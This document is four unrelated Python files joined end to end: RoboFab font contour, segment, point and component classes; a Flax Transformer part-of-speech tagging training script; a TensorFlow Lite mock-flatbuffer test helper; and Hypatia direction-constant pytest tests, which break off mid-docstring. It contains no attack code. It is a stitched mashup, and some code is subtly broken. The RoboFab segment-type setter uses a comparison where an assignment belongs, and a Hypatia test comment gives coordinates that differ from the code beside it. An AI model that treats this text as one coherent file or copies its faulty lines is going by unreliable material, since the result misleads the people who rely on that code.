def reverseContour(self):
"""reverse the contour"""
from robofab.pens.reverseContourPointPen import ReverseContourPointPen
index = self.index
glyph = self.getParent()
pen = glyph.getPointPen()
reversePen = ReverseContourPointPen(pen)
self.drawPoints(reversePen)
# we've drawn the reversed contour onto our parent glyph,
# so it sits at the end of the contours list:
newContour = glyph.contours.pop(-1)
for segment in newContour.segments:
segment.setParent(self)
self.segments = newContour.segments
self._hasChanged()
def setStartSegment(self, segmentIndex):
"""set the first segment on the contour"""
# this obviously does not support open contours
if len(self.segments) < 2:
return
if segmentIndex == 0:
return
if segmentIndex > len(self.segments)-1:
raise IndexError, 'segment index not in segments list'
oldStart = self.segments[0]
oldLast = self.segments[-1]
#check to see if the contour ended with a curve on top of the move
#if we find one delete it,
if oldLast.type == CURVE or oldLast.type == QCURVE:
startOn = oldStart.onCurve
lastOn = oldLast.onCurve
if startOn.x == lastOn.x and startOn.y == lastOn.y:
del self.segments[0]
# since we deleted the first contour, the segmentIndex needs to shift
segmentIndex = segmentIndex - 1
# if we DO have a move left over, we need to convert it to a line
if self.segments[0].type == MOVE:
self.segments[0].type = LINE
# slice up the segments and reassign them to the contour
segments = self.segments[segmentIndex:]
self.segments = segments + self.segments[:segmentIndex]
# now, draw the contour onto the parent glyph
glyph = self.getParent()
pen = glyph.getPointPen()
self.drawPoints(pen)
# we've drawn the new contour onto our parent glyph,
# so it sits at the end of the contours list:
newContour = glyph.contours.pop(-1)
for segment in newContour.segments:
segment.setParent(self)
self.segments = newContour.segments
self._hasChanged()
class RSegment(BaseSegment):
_title = "RoboFabSegment"
def __init__(self, segmentType=None, points=[], smooth=False):
BaseSegment.__init__(self)
self.selected = False
self.points = []
self.smooth = smooth
if points:
#the points in the segment should be RPoints, so create those objects
for point in points[:-1]:
x, y = point
p = RPoint(x, y, pointType=OFFCURVE)
p.setParent(self)
self.points.append(p)
aX, aY = points[-1]
p = RPoint(aX, aY, segmentType)
p.setParent(self)
self.points.append(p)
def _get_type(self):
return self.points[-1].type
def _set_type(self, pointType):
onCurve = self.points[-1]
ocType = onCurve.type
if ocType == pointType:
return
#we are converting a cubic line into a cubic curve
if pointType == CURVE and ocType == LINE:
onCurve.type = pointType
parent = self.getParent()
prev = parent._prevSegment(self.index)
p1 = RPoint(prev.onCurve.x, prev.onCurve.y, pointType=OFFCURVE)
p1.setParent(self)
p2 = RPoint(onCurve.x, onCurve.y, pointType=OFFCURVE)
p2.setParent(self)
self.points.insert(0, p2)
self.points.insert(0, p1)
#we are converting a cubic move to a curve
elif pointType == CURVE and ocType == MOVE:
onCurve.type = pointType
parent = self.getParent()
prev = parent._prevSegment(self.index)
p1 = RPoint(prev.onCurve.x, prev.onCurve.y, pointType=OFFCURVE)
p1.setParent(self)
p2 = RPoint(onCurve.x, onCurve.y, pointType=OFFCURVE)
p2.setParent(self)
self.points.insert(0, p2)
self.points.insert(0, p1)
#we are converting a quad curve to a cubic curve
elif pointType == CURVE and ocType == QCURVE:
onCurve.type == CURVE
#we are converting a cubic curve into a cubic line
elif pointType == LINE and ocType == CURVE:
p = self.points.pop(-1)
self.points = [p]
onCurve.type = pointType
self.smooth = False
#we are converting a cubic move to a line
elif pointType == LINE and ocType == MOVE:
onCurve.type = pointType
#we are converting a quad curve to a line:
elif pointType == LINE and ocType == QCURVE:
p = self.points.pop(-1)
self.points = [p]
onCurve.type = pointType
self.smooth = False
# we are converting to a quad curve where just about anything is legal
elif pointType == QCURVE:
onCurve.type = pointType
else:
raise RoboFabError, 'unknown segment type'
type = property(_get_type, _set_type, doc="type of the segment")
def _get_index(self):
return self.getParent().segments.index(self)
index = property(_get_index, doc="index of the segment")
def insertPoint(self, index, pointType, point):
x, y = point
p = RPoint(x, y, pointType=pointType)
p.setParent(self)
self.points.insert(index, p)
self._hasChanged()
def removePoint(self, index):
del self.points[index]
self._hasChanged()
class RBPoint(BaseBPoint):
_title = "RoboFabBPoint"
def _setAnchorChanged(self, value):
self._anchorPoint.setChanged(value)
def _setNextChanged(self, value):
self._nextOnCurve.setChanged(value)
def _get__parentSegment(self):
return self.getParent()
_parentSegment = property(_get__parentSegment, doc="")
def _get__nextOnCurve(self):
pSeg = self._parentSegment
contour = pSeg.getParent()
#could this potentially return an incorrect index? say, if two segments are exactly the same?
return contour.segments[(contour.segments.index(pSeg) + 1) % len(contour.segments)]
_nextOnCurve = property(_get__nextOnCurve, doc="")
def _get_index(self):
return self._parentSegment.index
index = property(_get_index, doc="index of the bPoint on the contour")
class RPoint(BasePoint):
_title = "RoboFabPoint"
def __init__(self, x=0, y=0, pointType=None, name=None):
self.selected = False
self._type = pointType
self._x = x
self._y = y
self._name = name
def _get_x(self):
return self._x
def _set_x(self, value):
self._x = value
self._hasChanged()
x = property(_get_x, _set_x, doc="")
def _get_y(self):
return self._y
def _set_y(self, value):
self._y = value
self._hasChanged()
y = property(_get_y, _set_y, doc="")
def _get_type(self):
return self._type
def _set_type(self, value):
self._type = value
self._hasChanged()
type = property(_get_type, _set_type, doc="")
def _get_name(self):
return self._name
def _set_name(self, value):
self._name = value
self._hasChanged()
name = property(_get_name, _set_name, doc="")
class RAnchor(BaseAnchor):
_title = "RoboFabAnchor"
def __init__(self, name=None, position=None, mark=None):
BaseAnchor.__init__(self)
self.selected = False
self.name = name
if position is None:
self.x = self.y = None
else:
self.x, self.y = position
self.mark = mark
def _get_index(self):
if self.getParent() is None: return None
return self.getParent().anchors.index(self)
index = property(_get_index, doc="index of the anchor")
def _get_position(self):
return (self.x, self.y)
def _set_position(self, value):
self.x = value[0]
self.y = value[1]
self._hasChanged()
position = property(_get_position, _set_position, doc="position of the anchor")
def move(self, (x, y)):
"""Move the anchor"""
self.x = self.x + x
self.y = self.y + y
self._hasChanged()
class RComponent(BaseComponent):
_title = "RoboFabComponent"
def __init__(self, baseGlyphName=None, offset=(0,0), scale=(1,1), transform=None):
BaseComponent.__init__(self)
self.selected = False
self._baseGlyph = baseGlyphName
self._offset = offset
self._scale = scale
if transform is None:
xx, yy = scale
dx, dy = offset
self.transformation = (xx, 0, 0, yy, dx, dy)
else:
self.transformation = transform
def _get_index(self):
if self.getParent() is None: return None
return self.getParent().components.index(self)
index = property(_get_index, doc="index of the component")
def _get_baseGlyph(self):
return self._baseGlyph
def _set_baseGlyph(self, glyphName):
# XXXX needs to be implemented in objectsFL for symmetricity's sake. Eventually.
self._baseGlyph = glyphName
self._hasChanged()
baseGlyph = property(_get_baseGlyph, _set_baseGlyph, doc="")
def _get_offset(self):
""" Get the offset component of the transformation.="""
(xx, xy, yx, yy, dx, dy) = self._transformation
return dx, dy
def _set_offset(self, value):
""" Set the offset component of the transformation."""
(xx, xy, yx, yy, dx, dy) = self._transformation
self._transformation = (xx, xy, yx, yy, value[0], value[1])
self._hasChanged()
offset = property(_get_offset, _set_offset, doc="the offset of the component")
def _get_scale(self):
""" Return the scale components of the transformation."""
(xx, xy, yx, yy, dx, dy) = self._transformation
return xx, yy
def _set_scale(self, (xScale, yScale)):
""" Set the scale component of the transformation.
Note: setting this value effectively makes the xy and yx values meaningless.
We're assuming that if you're setting the xy and yx values, you will use
the transformation attribute rather than the scale and offset attributes.
"""
(xx, xy, yx, yy, dx, dy) = self._transformation
self._transformation = (xScale, xy, yx, yScale, dx, dy)
self._hasChanged()
scale = property(_get_scale, _set_scale, doc="the scale of the component")
def _get_transformation(self):
return self._transformation
def _set_transformation(self, transformation):
assert len(transformation)==6, "Transformation matrix must have 6 values"
self._transformation = transformation
transformation = property(_get_transformation, _set_transformation, doc="the transformation matrix of the component")
def move(self, (x, y)):
"""Move the component"""
(xx, xy, yx, yy, dx, dy) = self._transformation
self._transformation = (xx, xy, yx, yy, dx+x, dy+y)
self._hasChanged()
def decompose(self):
"""Decompose the component"""
baseGlyphName = self.baseGlyph
parentGlyph = self.getParent()
# if there is no parent glyph, there is nothing to decompose to
if baseGlyphName is not None and parentGlyph is not None:
parentFont = parentGlyph.getParent()
# we must have a parent glyph with the baseGlyph
# if not, we will simply remove the component from
# the parent glyph thereby decomposing the component
# to nothing.
if parentFont is not None and parentFont.has_key(baseGlyphName):
from robofab.pens.adapterPens import TransformPointPen
baseGlyph = parentFont[baseGlyphName]
for contour in baseGlyph.contours:
pointPen = parentGlyph.getPointPen()
transPen = TransformPointPen(pointPen, self._transformation)
contour.drawPoints(transPen)
parentGlyph.components.remove(self)
class RKerning(BaseKerning):
_title = "RoboFabKerning"
class RGroups(BaseGroups):
_title = "RoboFabGroups"
class RLib(BaseLib):
_title = "RoboFabLib"
class RInfo(BaseInfo):
_title = "RoboFabFontInfo"
class RFeatures(BaseFeatures):
_title = "RoboFabFeatures"
|
|
# Copyright 2022 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Sequence Tagging example.
This script trains a Transformer on the Universal dependency dataset.
"""
import functools
import os
import time
from absl import app
from absl import flags
from absl import logging
from flax import jax_utils
from flax import linen as nn
from flax.metrics import tensorboard
from flax import optim
from flax.training import common_utils
import jax
import jax.numpy as jnp
from jax import random
import numpy as np
import tensorflow as tf
import input_pipeline
import models
FLAGS = flags.FLAGS
flags.DEFINE_string('model_dir', default='', help=('Directory for model data.'))
flags.DEFINE_string('experiment', default='xpos', help=('Experiment name.'))
flags.DEFINE_integer(
'batch_size', default=64, help=('Batch size for training.'))
flags.DEFINE_integer(
'eval_frequency',
default=100,
help=('Frequency of eval during training, e.g. every 1000 steps.'))
flags.DEFINE_integer(
'num_train_steps', default=75000, help=('Number of train steps.'))
flags.DEFINE_float('learning_rate', default=0.05, help=('Learning rate.'))
flags.DEFINE_float(
'weight_decay',
default=1e-1,
help=('Decay factor for AdamW style weight decay.'))
flags.DEFINE_integer('max_length', default=256,
help=('Maximum length of examples.'))
flags.DEFINE_integer(
'random_seed', default=0, help=('Integer for PRNG random seed.'))
flags.DEFINE_string('train', default='', help=('Path to training data.'))
flags.DEFINE_string('dev', default='', help=('Path to development data.'))
def create_learning_rate_scheduler(
factors='constant * linear_warmup * rsqrt_decay',
base_learning_rate=0.5,
warmup_steps=8000,
decay_factor=0.5,
steps_per_decay=20000,
steps_per_cycle=100000):
"""creates learning rate schedule.
Interprets factors in the factors string which can consist of:
* constant: interpreted as the constant value,
* linear_warmup: interpreted as linear warmup until warmup_steps,
* rsqrt_decay: divide by square root of max(step, warmup_steps)
* decay_every: Every k steps decay the learning rate by decay_factor.
* cosine_decay: Cyclic cosine decay, uses steps_per_cycle parameter.
Args:
factors: a string with factors separated by '*' that defines the schedule.
base_learning_rate: float, the starting constant for the lr schedule.
warmup_steps: how many steps to warm up for in the warmup schedule.
decay_factor: The amount to decay the learning rate by.
steps_per_decay: How often to decay the learning rate.
steps_per_cycle: Steps per cycle when using cosine decay.
Returns:
a function learning_rate(step): float -> {'learning_rate': float}, the
step-dependent lr.
"""
factors = [n.strip() for n in factors.split('*')]
def step_fn(step):
"""Step to learning rate function."""
ret = 1.0
for name in factors:
if name == 'constant':
ret *= base_learning_rate
elif name == 'linear_warmup':
ret *= jnp.minimum(1.0, step / warmup_steps)
elif name == 'rsqrt_decay':
ret /= jnp.sqrt(jnp.maximum(step, warmup_steps))
elif name == 'rsqrt_normalized_decay':
ret *= jnp.sqrt(warmup_steps)
ret /= jnp.sqrt(jnp.maximum(step, warmup_steps))
elif name == 'decay_every':
ret *= (decay_factor**(step // steps_per_decay))
elif name == 'cosine_decay':
progress = jnp.maximum(0.0,
(step - warmup_steps) / float(steps_per_cycle))
ret *= jnp.maximum(0.0,
0.5 * (1.0 + jnp.cos(jnp.pi * (progress % 1.0))))
else:
raise ValueError('Unknown factor %s.' % name)
return jnp.asarray(ret, dtype=jnp.float32)
return step_fn
def compute_weighted_cross_entropy(logits, targets, weights=None):
"""Compute weighted cross entropy and entropy for log probs and targets.
Args:
logits: [batch, length, num_classes] float array.
targets: categorical targets [batch, length] int array.
weights: None or array of shape [batch x length]
Returns:
Tuple of scalar loss and batch normalizing factor.
"""
if logits.ndim != targets.ndim + 1:
raise ValueError('Incorrect shapes. Got shape %s logits and %s targets' %
(str(logits.shape), str(targets.shape)))
onehot_targets = common_utils.onehot(targets, logits.shape[-1])
loss = -jnp.sum(onehot_targets * nn.log_softmax(logits), axis=-1)
normalizing_factor = onehot_targets.sum()
if weights is not None:
loss = loss * weights
normalizing_factor = weights.sum()
return loss.sum(), normalizing_factor
def compute_weighted_accuracy(logits, targets, weights=None):
"""Compute weighted accuracy for log probs and targets.
Args:
logits: [batch, length, num_classes] float array.
targets: categorical targets [batch, length] int array.
weights: None or array of shape [batch x length]
Returns:
Tuple of scalar accuracy and batch normalizing factor.
"""
if logits.ndim != targets.ndim + 1:
raise ValueError('Incorrect shapes. Got shape %s logits and %s targets' %
(str(logits.shape), str(targets.shape)))
loss = jnp.equal(jnp.argmax(logits, axis=-1), targets)
normalizing_factor = np.prod(logits.shape[:-1])
if weights is not None:
loss = loss * weights
normalizing_factor = weights.sum()
return loss.sum(), normalizing_factor
def compute_metrics(logits, labels, weights):
"""Compute summary metrics."""
loss, weight_sum = compute_weighted_cross_entropy(logits, labels, weights)
acc, _ = compute_weighted_accuracy(logits, labels, weights)
metrics = {
'loss': loss,
'accuracy': acc,
'denominator': weight_sum,
}
metrics = np.sum(metrics, -1)
return metrics
def train_step(optimizer, batch, learning_rate_fn, model, dropout_rng=None):
"""Perform a single training step."""
train_keys = ['inputs', 'targets']
(inputs, targets) = [batch.get(k, None) for k in train_keys]
weights = jnp.where(targets > 0, 1, 0).astype(jnp.float32)
dropout_rng, new_dropout_rng = random.split(dropout_rng)
def loss_fn(params):
"""Loss function used for training."""
logits = model.apply({'params': params}, inputs=inputs, train=True,
rngs={'dropout': dropout_rng})
loss, weight_sum = compute_weighted_cross_entropy(logits, targets, weights)
mean_loss = loss / weight_sum
return mean_loss, logits
step = optimizer.state.step
lr = learning_rate_fn(step)
grad_fn = jax.value_and_grad(loss_fn, has_aux=True)
(_, logits), grad = grad_fn(optimizer.target)
grad = jax.lax.pmean(grad, 'batch')
new_optimizer = optimizer.apply_gradient(grad, learning_rate=lr)
metrics = compute_metrics(logits, targets, weights)
metrics['learning_rate'] = lr
return new_optimizer, metrics, new_dropout_rng
def pad_examples(x, desired_batch_size):
"""Expand batch to desired size by zeros with the shape of last slice."""
batch_pad = desired_batch_size - x.shape[0]
# Padding with zeros to avoid that they get counted in compute_metrics.
return np.concatenate([x, np.tile(np.zeros_like(x[-1]), (batch_pad, 1))])
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
# Make sure tf does not allocate gpu memory.
tf.config.experimental.set_visible_devices([], 'GPU')
batch_size = FLAGS.batch_size
learning_rate = FLAGS.learning_rate
num_train_steps = FLAGS.num_train_steps
eval_freq = FLAGS.eval_frequency
random_seed = FLAGS.random_seed
if not FLAGS.dev:
raise app.UsageError('Please provide path to dev set.')
if not FLAGS.train:
raise app.UsageError('Please provide path to training set.')
if batch_size % jax.device_count() > 0:
raise ValueError('Batch size must be divisible by the number of devices')
device_batch_size = batch_size // jax.device_count()
if jax.process_index() == 0:
train_summary_writer = tensorboard.SummaryWriter(
os.path.join(FLAGS.model_dir, FLAGS.experiment + '_train'))
eval_summary_writer = tensorboard.SummaryWriter(
os.path.join(FLAGS.model_dir, FLAGS.experiment + '_eval'))
# create the training and development dataset
vocabs = input_pipeline.create_vocabs(FLAGS.train)
config = models.TransformerConfig(
vocab_size=len(vocabs['forms']),
output_vocab_size=len(vocabs['xpos']),
max_len=FLAGS.max_length)
attributes_input = [input_pipeline.CoNLLAttributes.FORM]
attributes_target = [input_pipeline.CoNLLAttributes.XPOS]
train_ds = input_pipeline.sentence_dataset_dict(
FLAGS.train,
vocabs,
attributes_input,
attributes_target,
batch_size=batch_size,
bucket_size=config.max_len)
train_iter = iter(train_ds)
eval_ds = input_pipeline.sentence_dataset_dict(
FLAGS.dev,
vocabs,
attributes_input,
attributes_target,
batch_size=batch_size,
bucket_size=config.max_len,
repeat=1)
model = models.Transformer(config)
rng = random.PRNGKey(random_seed)
rng, init_rng = random.split(rng)
# call a jitted initialization function to get the initial parameter tree
@jax.jit
def initialize_variables(init_rng):
init_batch = jnp.ones((config.max_len, 1), jnp.float32)
init_variables = model.init(init_rng, inputs=init_batch, train=False)
return init_variables
init_variables = initialize_variables(init_rng)
optimizer_def = optim.Adam(learning_rate, beta1=0.9, beta2=0.98,
eps=1e-9, weight_decay=1e-1)
optimizer = optimizer_def.create(init_variables['params'])
optimizer = jax_utils.replicate(optimizer)
learning_rate_fn = create_learning_rate_scheduler(
base_learning_rate=learning_rate)
p_train_step = jax.pmap(
functools.partial(train_step, model=model, learning_rate_fn=learning_rate_fn),
axis_name='batch')
def eval_step(params, batch):
"""Calculate evaluation metrics on a batch."""
inputs, targets = batch['inputs'], batch['targets']
weights = jnp.where(targets > 0, 1.0, 0.0)
logits = model.apply({'params': params}, inputs=inputs, train=False)
return compute_metrics(logits, targets, weights)
p_eval_step = jax.pmap(eval_step, axis_name='batch')
# We init the first set of dropout PRNG keys, but update it afterwards inside
# the main pmap'd training update for performance.
dropout_rngs = random.split(rng, jax.local_device_count())
metrics_all = []
tick = time.time()
best_dev_score = 0
for step, batch in zip(range(num_train_steps), train_iter):
batch = common_utils.shard(jax.tree_map(lambda x: x._numpy(), batch)) # pylint: disable=protected-access
optimizer, metrics, dropout_rngs = p_train_step(optimizer, batch, dropout_rng=dropout_rngs)
metrics_all.append(metrics)
if (step + 1) % eval_freq == 0:
metrics_all = common_utils.get_metrics(metrics_all)
lr = metrics_all.pop('learning_rate').mean()
metrics_sums = jax.tree_map(jnp.sum, metrics_all)
denominator = metrics_sums.pop('denominator')
summary = jax.tree_map(lambda x: x / denominator, metrics_sums) # pylint: disable=cell-var-from-loop
summary['learning_rate'] = lr
logging.info('train in step: %d, loss: %.4f', step, summary['loss'])
if jax.process_index() == 0:
tock = time.time()
steps_per_sec = eval_freq / (tock - tick)
tick = tock
train_summary_writer.scalar('steps per second', steps_per_sec, step)
for key, val in summary.items():
train_summary_writer.scalar(key, val, step)
train_summary_writer.flush()
metrics_all = [] # reset metric accumulation for next evaluation cycle.
eval_metrics = []
eval_iter = iter(eval_ds)
for eval_batch in eval_iter:
eval_batch = jax.tree_map(lambda x: x._numpy(), eval_batch) # pylint: disable=protected-access
# Handle final odd-sized batch by padding instead of dropping it.
cur_pred_batch_size = eval_batch['inputs'].shape[0]
if cur_pred_batch_size != batch_size:
# pad up to batch size
eval_batch = jax.tree_map(
lambda x: pad_examples(x, batch_size), eval_batch)
eval_batch = common_utils.shard(eval_batch)
metrics = p_eval_step(optimizer.target, eval_batch)
eval_metrics.append(metrics)
eval_metrics = common_utils.get_metrics(eval_metrics)
eval_metrics_sums = jax.tree_map(jnp.sum, eval_metrics)
eval_denominator = eval_metrics_sums.pop('denominator')
eval_summary = jax.tree_map(
lambda x: x / eval_denominator, # pylint: disable=cell-var-from-loop
eval_metrics_sums)
logging.info('eval in step: %d, loss: %.4f, accuracy: %.4f', step,
eval_summary['loss'], eval_summary['accuracy'])
if best_dev_score < eval_summary['accuracy']:
best_dev_score = eval_summary['accuracy']
# TODO: save model.
eval_summary['best_dev_score'] = best_dev_score
logging.info('best development model score %.4f', best_dev_score)
if jax.process_index() == 0:
for key, val in eval_summary.items():
eval_summary_writer.scalar(key, val, step)
eval_summary_writer.flush()
if __name__ == '__main__':
app.run(main)
|
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions that support testing.
All functions that can be commonly used by various tests are in this file.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from flatbuffers.python import flatbuffers
from tensorflow.lite.python import schema_py_generated as schema_fb
def BuildMockModel():
"""Creates a flatbuffer object containing an example model."""
builder = flatbuffers.Builder(1024)
schema_fb.BufferStart(builder)
buffer0_offset = schema_fb.BufferEnd(builder)
schema_fb.BufferStartDataVector(builder, 10)
builder.PrependUint8(0)
builder.PrependUint8(1)
builder.PrependUint8(2)
builder.PrependUint8(3)
builder.PrependUint8(4)
builder.PrependUint8(5)
builder.PrependUint8(6)
builder.PrependUint8(7)
builder.PrependUint8(8)
builder.PrependUint8(9)
buffer1_data_offset = builder.EndVector(10)
schema_fb.BufferStart(builder)
schema_fb.BufferAddData(builder, buffer1_data_offset)
buffer1_offset = schema_fb.BufferEnd(builder)
schema_fb.BufferStart(builder)
buffer2_offset = schema_fb.BufferEnd(builder)
schema_fb.ModelStartBuffersVector(builder, 3)
builder.PrependUOffsetTRelative(buffer2_offset)
builder.PrependUOffsetTRelative(buffer1_offset)
builder.PrependUOffsetTRelative(buffer0_offset)
buffers_offset = builder.EndVector(3)
string0_offset = builder.CreateString('input_tensor')
schema_fb.TensorStartShapeVector(builder, 3)
builder.PrependInt32(1)
builder.PrependInt32(2)
builder.PrependInt32(5)
shape0_offset = builder.EndVector(3)
schema_fb.TensorStart(builder)
schema_fb.TensorAddName(builder, string0_offset)
schema_fb.TensorAddShape(builder, shape0_offset)
schema_fb.TensorAddType(builder, 0)
schema_fb.TensorAddBuffer(builder, 0)
tensor0_offset = schema_fb.TensorEnd(builder)
schema_fb.QuantizationParametersStartMinVector(builder, 5)
builder.PrependFloat32(0.5)
builder.PrependFloat32(2.0)
builder.PrependFloat32(5.0)
builder.PrependFloat32(10.0)
builder.PrependFloat32(20.0)
quant1_min_offset = builder.EndVector(5)
schema_fb.QuantizationParametersStartMaxVector(builder, 5)
builder.PrependFloat32(10.0)
builder.PrependFloat32(20.0)
builder.PrependFloat32(-50.0)
builder.PrependFloat32(1.0)
builder.PrependFloat32(2.0)
quant1_max_offset = builder.EndVector(5)
schema_fb.QuantizationParametersStartScaleVector(builder, 5)
builder.PrependFloat32(3.0)
builder.PrependFloat32(4.0)
builder.PrependFloat32(5.0)
builder.PrependFloat32(6.0)
builder.PrependFloat32(7.0)
quant1_scale_offset = builder.EndVector(5)
schema_fb.QuantizationParametersStartZeroPointVector(builder, 5)
builder.PrependInt64(1)
builder.PrependInt64(2)
builder.PrependInt64(3)
builder.PrependInt64(-1)
builder.PrependInt64(-2)
quant1_zero_point_offset = builder.EndVector(5)
schema_fb.QuantizationParametersStart(builder)
schema_fb.QuantizationParametersAddMin(builder, quant1_min_offset)
schema_fb.QuantizationParametersAddMax(builder, quant1_max_offset)
schema_fb.QuantizationParametersAddScale(builder, quant1_scale_offset)
schema_fb.QuantizationParametersAddZeroPoint(builder,
quant1_zero_point_offset)
quantization1_offset = schema_fb.QuantizationParametersEnd(builder)
string1_offset = builder.CreateString('constant_tensor')
schema_fb.TensorStartShapeVector(builder, 3)
builder.PrependInt32(1)
builder.PrependInt32(2)
builder.PrependInt32(5)
shape1_offset = builder.EndVector(3)
schema_fb.TensorStart(builder)
schema_fb.TensorAddName(builder, string1_offset)
schema_fb.TensorAddShape(builder, shape1_offset)
schema_fb.TensorAddType(builder, 0)
schema_fb.TensorAddBuffer(builder, 1)
schema_fb.TensorAddQuantization(builder, quantization1_offset)
tensor1_offset = schema_fb.TensorEnd(builder)
string2_offset = builder.CreateString('output_tensor')
schema_fb.TensorStartShapeVector(builder, 3)
builder.PrependInt32(1)
builder.PrependInt32(2)
builder.PrependInt32(5)
shape2_offset = builder.EndVector(3)
schema_fb.TensorStart(builder)
schema_fb.TensorAddName(builder, string2_offset)
schema_fb.TensorAddShape(builder, shape2_offset)
schema_fb.TensorAddType(builder, 0)
schema_fb.TensorAddBuffer(builder, 2)
tensor2_offset = schema_fb.TensorEnd(builder)
schema_fb.SubGraphStartTensorsVector(builder, 3)
builder.PrependUOffsetTRelative(tensor2_offset)
builder.PrependUOffsetTRelative(tensor1_offset)
builder.PrependUOffsetTRelative(tensor0_offset)
tensors_offset = builder.EndVector(3)
schema_fb.SubGraphStartInputsVector(builder, 1)
builder.PrependInt32(0)
inputs_offset = builder.EndVector(1)
schema_fb.SubGraphStartOutputsVector(builder, 1)
builder.PrependInt32(2)
outputs_offset = builder.EndVector(1)
schema_fb.OperatorCodeStart(builder)
schema_fb.OperatorCodeAddBuiltinCode(builder, schema_fb.BuiltinOperator.ADD)
schema_fb.OperatorCodeAddVersion(builder, 1)
code_offset = schema_fb.OperatorCodeEnd(builder)
schema_fb.ModelStartOperatorCodesVector(builder, 1)
builder.PrependUOffsetTRelative(code_offset)
codes_offset = builder.EndVector(1)
schema_fb.OperatorStartInputsVector(builder, 2)
builder.PrependInt32(0)
builder.PrependInt32(1)
op_inputs_offset = builder.EndVector(2)
schema_fb.OperatorStartOutputsVector(builder, 1)
builder.PrependInt32(2)
op_outputs_offset = builder.EndVector(1)
schema_fb.OperatorStart(builder)
schema_fb.OperatorAddOpcodeIndex(builder, 0)
schema_fb.OperatorAddInputs(builder, op_inputs_offset)
schema_fb.OperatorAddOutputs(builder, op_outputs_offset)
op_offset = schema_fb.OperatorEnd(builder)
schema_fb.SubGraphStartOperatorsVector(builder, 1)
builder.PrependUOffsetTRelative(op_offset)
ops_offset = builder.EndVector(1)
string3_offset = builder.CreateString('subgraph_name')
schema_fb.SubGraphStart(builder)
schema_fb.SubGraphAddName(builder, string3_offset)
schema_fb.SubGraphAddTensors(builder, tensors_offset)
schema_fb.SubGraphAddInputs(builder, inputs_offset)
schema_fb.SubGraphAddOutputs(builder, outputs_offset)
schema_fb.SubGraphAddOperators(builder, ops_offset)
subgraph_offset = schema_fb.SubGraphEnd(builder)
schema_fb.ModelStartSubgraphsVector(builder, 1)
builder.PrependUOffsetTRelative(subgraph_offset)
subgraphs_offset = builder.EndVector(1)
string4_offset = builder.CreateString('model_description')
schema_fb.ModelStart(builder)
schema_fb.ModelAddOperatorCodes(builder, codes_offset)
schema_fb.ModelAddSubgraphs(builder, subgraphs_offset)
schema_fb.ModelAddDescription(builder, string4_offset)
schema_fb.ModelAddBuffers(builder, buffers_offset)
model_offset = schema_fb.ModelEnd(builder)
builder.Finish(model_offset)
model_data = builder.Output()
return model_data
|
|
# This module is part of Hypatia and is released under the
# MIT license: http://opensource.org/licenses/MIT
"""py.test unit testing for hypatia/constants.py
"""
import os
import pygame
import pytest
from hypatia import physics
from hypatia import constants
try:
os.chdir('demo')
except OSError:
pass
class TestDirection(object):
"""Various tests for py.test regarding constants.Direction.
See Also:
constants.Direction
"""
def test_add(self):
"""Assure that adding cardinal directions
together produces an ordinal direction.
"""
# North + West == North West
assert (constants.Direction.north + constants.Direction.west ==
constants.Direction.north_west)
# North + East == North East
assert (constants.Direction.north + constants.Direction.east ==
constants.Direction.north_east)
# South + West == South West
assert (constants.Direction.south + constants.Direction.west ==
constants.Direction.south_west)
# South + East = South East
assert (constants.Direction.south + constants.Direction.east ==
constants.Direction.south_east)
def test_disposition(self):
"""Assure the ability to get a pixel (x, y) offset
from a direction using Direction.disposition() works.
"""
direction = constants.Direction
# north disposition of 1 is (0, -1)
# The default offset/padding is 1.
assert direction.disposition(direction.north) == (0, -1)
# north east disposition of 98 is (98, -98)
assert direction.disposition(direction.north_east, 98,) == (98, -98)
# east disposition of 9 is (9, 0):
assert direction.disposition(direction.east, 9) == (9, 0)
# South East disposition of 30 is (30, 30)
assert direction.disposition(direction.south_east, 30) == (30, 30)
# South disposition of 4 is (0, 4)
assert direction.disposition(direction.south, 4) == (0, 4)
# South West disposition of 8 is (-8, 8)
assert direction.disposition(direction.south_west, 8) == (-8, 8)
# A west disposition of 1 is (-1, 0)
assert direction.disposition(direction.west, margin=1) == (-1, 0)
# north west disposition of 55 is (-55, -55)
assert direction.disposition(direction.north_west, 55) == (-55, -55)
def test_from_velocity(self):
"""Check that we are reliably producing
a direction from a given velocity.
"""
# (0, -8) is moving North
velocity = physics.Velocity(0, -8)
assert (constants.Direction.from_velocity(velocity) ==
constants.Direction.north)
# (999, 0) is moving East
velocity = physics.Velocity(999, 0)
assert (constants.Direction.from_velocity(velocity) ==
constants.Direction.east)
# (0, 1) is moving South
velocity = physics.Velocity(0, 1)
assert (constants.Direction.from_velocity(velocity) ==
constants.Direction.south)
# (-10, 0) is moving West
velocity = physics.Velocity(-10, 0)
assert (constants.Direction.from_velocity(velocity) ==
constants.Direction.west)
# (2, -5) is moving North East
velocity = physics.Velocity(2, -5)
assert (constants.Direction.from_velocity(velocity) ==
constants.Direction.north_east)
# (73, 9) is moving South East
velocity = physics.Velocity(73, 9)
assert (constants.Direction.from_velocity(velocity) ==
constants.Direction.south_east)
# (-22, 55) is moving South West
velocity = physics.Velocity(-22, 55)
assert (constants.Direction.from_velocity(velocity) ==
constants.Direction.south_west)
# (-6, -44) is moving North West
velocity = physics.Velocity(-6, -55)
assert (constants.Direction.from_velocity(velocity) ==
constants.Direction.north_west)
# (0, 0) is no direction/none
velocity = physics.Velocity(0, 0)
assert constants.Direction.from_velocity(velocity) is None
def test_cardinal(self):
"""Assure the cardinal directions produce match
the order and values supplied.
"""
# Cardinals: North, East, South, West
assert (constants.Direction.north,
constants.Direction.east,
constants.Direction.south,
constants.Direction.west) == constants.Direction.cardinal()
def test_direction_aliases(self):
"""Test that the various aliases for directions work, i.e.,
